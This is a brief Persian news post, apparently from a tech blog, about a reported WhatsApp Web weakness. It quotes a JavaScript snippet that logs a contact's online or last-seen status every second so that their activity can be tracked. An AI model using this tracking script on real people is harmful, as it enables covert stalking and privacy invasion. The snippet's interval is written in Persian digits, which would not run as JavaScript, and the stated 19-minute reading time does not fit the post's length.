کشف آسیب پذیری جدیدی در واتس‌اپ

زمان تقریبی برای خواندن این نوشته: 19 دقیقه

آقای Robert Heaton در وبلاگش خبر از کشف باگی جدید در نرم افزار واتس‌اپ داده که با اکسپلویت آن می‌توان به صحبت کردن همزمان دو کاربر پی‌برد.
وی از طریق افزونه گوگل کروم و کدهای زیر موفق به انجام این کار شده است:
setInterval(function() {
var lastSeen = $('.pane-header .chat-body .emojitext').last().text();
console.log(Math.floor(Date.now() / 1000) + ", " + lastSeen);
}, ۱۰۰۰);

با این آسیب پذیری چه کاری میشه انجام داد؟
با این آسیب‌پذیری نمیشه به چت و پیام کاربران دسترسی داشت ولی وضعیت آنلاین یا آفلاین هر مخاطبی را می‌تومان لاگ کرد.

ارسال نظر جدید